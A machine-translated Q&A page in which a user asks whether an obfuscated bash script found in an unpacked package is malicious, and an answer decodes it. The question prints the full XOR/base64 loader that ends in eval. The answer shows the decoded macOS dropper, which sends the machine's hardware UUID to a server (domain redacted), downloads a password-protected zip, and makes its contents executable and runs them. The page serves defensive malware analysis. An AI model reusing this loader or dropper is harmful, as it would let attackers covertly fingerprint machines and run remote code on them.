时间戳

首页 > 解决方案 > 一个可疑的 bash 代码,谁能帮我解释一下?

bash - 一个可疑的 bash 代码,谁能帮我解释一下?

问题描述

解压一个包,找到一段代码,因为我不擅长bash,不知道怎么办,但是怀疑是恶意代码,谁能帮我解释一下。

#!/bin/bash
_l() {
    _i=0;_x=0;
    for ((_i=0; _i<${#1}; _i+=2)) do
        __return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
        if (( (_x+=2)>=${#2} )); then ((_x=0)); fi
    done
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}

_m() {
    _v=$(base64 --decode <(printf "$1"));_k=$(xxd -pu <(printf "$2"));
    __return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}
_y="8903139122"
_t="MWIxODFmNTE1ODVkMTY1MzUzNDE1MDE5M2EzOTc0N2Q3YTZlNjI3MzZiNmEwZDExMDkwYTA5MDIwMzAxMDEwODAyMDExMzM5Nzg2MTYyNmQ3Yzc2N2Q3Mjc4N2QwNDEzNDU0NTRmMTc1MTVlNTI1YTU3MWY0MTQyNTk1YTU1MTEzYjcyNjk2MTZkNjA3NzZjNjQ3NjBjMTE1ZDVlNDU1YzU0NTY1MTU3MWU1NzU1NDI0NjEwMzI0YzVlNDk1ODQzNjY0MTUzNDE0YjRlNWY0MTU1MGUxYjAzMDAwMzAxMGEwMTAwMDEwYTAxMDkwYjAyMGIwODAzMGEwMDAxMGIwODEwMzgzMjU2NDM2YzQ3NTY0YjQyNWI1ZDU2MDQxMjE3MTk0MDRlNmU0NDU3NGE0YTEwMWU0MTQxNTY1NTQ3NTE0YzZmNTU0MTQyNWE1NjVmMWIxMDE4MzM0MzU2NDI0MDUwNWU1YzZkNWY0YzU5NTcwYzExMWQxOTQ3NDc1MTVkNTc1NjVmMWExYjExMzg1ZjU5NWE1ODVhNWY1NjY2NTg1NjBmMWExZDE4NTY1MjViNTYxMTFmNWMxODFiMTQxYjU4NWM0YjU0NTUxMjE1NGI1NDAyMTExZTVhMTE3YjdkNjg1NTUxNDc1NzVjNGI1Yzc3NGE0ODVjNDI0Nzc1NTY0ZjU4NTE1NzE4NDUxMDU0NDM1NjQ5MTExZjVkMTgxZTEyN2E3ZTYzNTU1MDQ2NTQ1NzRiNWQ2NjY0N2E3ZDEzMTIwZjE4MWI2YzFiMWYxOTY1MTgxMDE1MTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzMxNzFiMTAxYTYzNjcxMjZlMWExYTFiNzE2ZTAzNzg0OTE3MWExMzEzNDUxMTQ2NDAxODE0NTQ1MDExMTQ2MjZhMDg0MjRhNTA1ZTQ3MGI2ZTY0MTYxYjEwMTgzMzNhNDY0MzVmMDQxMzVhNDY0YzQ5MGExYzFlMTc0MjcwNjI2MjY3N2Q3ZjdlNzA3YTc3NGMxZDE2NDM3ODYwNjM2ZTYxNzY2NDY2Nzc0NTA2NWQ1YTU1MGUxZDRhNWY1MzViNTE1OTVkNTQ2YzUwNTU0ZjE0NGIwNDE0NDg0MjU2NGE0MjViNWQ1NjY2NTc0NjU4NTc0NDE3NWQwZjFjNDI1ZjQwNmU0NTVjNDM0MTViNTc1NzRkMTU0MTBlMWQ0YTc3N2M3YjY2NjA3MjYyNjA0NDEzMzg0NjU1NDk2ZjQzNTA0NzUxMGMxMDE2MTA1NDViNDc1NDVlNDkxMTFkNDY1NTQ5MWY2YjY5NmI2MTY5NmE2YTYwNjExOTExM2I1MDRjNDM1ZTEyMTU1ZjAwN2YxMTExMWQ0YTQ3NDA1NDQ0MTIxMzBmMWM1ZDU0NDQxZDU2NGM1YzVmMTEwMTA3MTcwMzEyMDYwNzEwMTc0YTQ3NTQ0MTZkNDI1OTRkNTg0ZTExMzk1ODQxNDI2ZDVjNTA0MjBlMTMxNzExNWM1OTQ2NWQ1NDQwMTMxYzU3MTkxZTQ2NWY0ODE2Njg2YjY5NmI2MTY5NmE2YTExMTYxMjEzM2I0NjU3NGI1YjQyMTgxNDYwMTMxMzE3NDI0NDVjNDg1MTQ5NmY0MzUwNDA0YTQ2NWQ0MDVjNDQxMjEzMTMxNzQyNDU1ZjQyNjc0OTUxNDc1OTRlMWIxMTFmNTYxODFiMTQ0ODUwNDM0OTZlNTY1YjRhNDQxMjEzMGYxMzE2NTU1NzQ0MTc1NzQ1NWY1ZDEzMGIwZjE0MDMxODMzNDI1ZTExMWU1ZjExMTY0OTRjNTQ0MDZjNDE1MjRkNTk0ZjEyMzI1ZjU5NWY1NDZjNTc1MDVmNTcwNTFiMTQxYjU2NDE1YzQxMTIxZjU1MDgxMDFlNDcxMzFiMWIxYzUzNDg0OTEyMTMwZDFiNTU0MjEyMWYwOTE5MTIxNzRhNTI0OTQxNmQ1NjUxNGI0ZDExMTgxYTFiMTEzODQ0NTc1NTQ1NWU1NDZjNTc1MDVmNTcwNTFiMTQxYjU0NTA1MTVlMTIxZjU2MTkxMjE3NGE2MzZlNzU0ZjEwMTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzM2NzE5MWQ2NDU3NTU0NTVlNTQ0MDE2NmE2YzFkNjUxMjE5MWMxZjE5Nzk2ZDAzNzI0ODFlMTkxMTExMzk0ZjVlNWU0NzU1NWM2ZjVkNTA1ZTVjMGMxMDE2NDM0ZjVmNWY0NDVlNWM2ZTVjNTM1NTVjMWYxYzExMWMxYzAzMDI0ZjFhMTkzYTUwNTk1ZTU2NTUxMjE5NDAxOTEyMTc0YTUyNDk0MTZkNTY1MTRiNGQxNzRhNTU1MDVkNTc2ZDU2NTg1ZDU2NGMxYzdhNWU1YzQ2NWQ1NzQ0NDAxZTdlNTg1MjdkNjExYTE2MWExMzNiNWM0OTU0NWMxMjE1NTgxMDExMTU0ODU4NDE0MjZkNWM1MDQyNGUxNTQ4NWY1ODVlNTc2NzU3NTE1ZTU0NGUxYjExMWYxZjU5NGI1NzQwMTExMTRhMTMxMjEwMWM0MjQzNTY0MjQwNTA1ZTVjNmQ1ZjRjNTk1NzRjMTExOTEzMTY0OTRlNTY1YzQ2NWM1NjY2NWY1MzVmNWQ0NDEyMzkK"

eval "$(_m "$_t" "$_y")"

标签: bashevalobfuscation

解决方案

顶部的两个函数_l()读取_m()两个字符串_y_t. _t包含混淆的代码并且_y行为有点像钥匙。密钥被逐个字母地应用于混淆代码,创建一个 base64 字符串,该字符串可以解码为eval命令可以执行的 bash 程序。

删除eval并回显结果,例如echo "$(_m "$_t" "$_y")"吐出将由eval命令执行的代码。这是非常安全的,因为我们现在实际上并没有eval使用混淆代码:

#!/bin/bash

ENC_PASS=<somepasswordhere>
APP_DOMAIN=<somewebsite>
APP_ROUTE="download/dlst"
unzip_password=<anotherpasswordhere>

os_version="$(sw_vers -productVersion)"
session_guid="$(uuidgen)"
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')"

url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path}
app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1
rm -f ${tmp_path}
file_name="$(grep -m1 -v "*.app" <(ls -1 "${app_dir}"))"
volume_name="$(echo -n "${PWD}" | sed -E -n 's@^(/Volumes/[^/]+)/.*@\1@p')"
volume_name="${volume_name// /%20}"
chmod +x "${app_dir}${file_name}/Contents/MacOS"/*
open -a "${app_dir}${file_name}" --args "s" "${session_guid}" "${volume_name}"

我建议不要运行它。编辑以删除网站和密码,以防万一这种混淆是由一些非常狡猾但不负责任的开发人员完成的,实际上并不是恶意的……尽管这几乎肯定是恶意的。您可以在没有eval自己的情况下运行以查看编辑位。

在较高级别上,这会将您的 comp 信息发送到服务器并下载 zip 文件。解压缩 zip 文件,使其内容可执行,然后执行它们。由于 zip (duh) 中的子文件夹,这仅适用于 Mac,MacOS而且还使用ioreg程序来收集存储在machine_id其中的数据,并将其发送到远程服务器。

下一步是获取该 zip 并查看它的作用。虽然我没有下载它;)

推荐阅读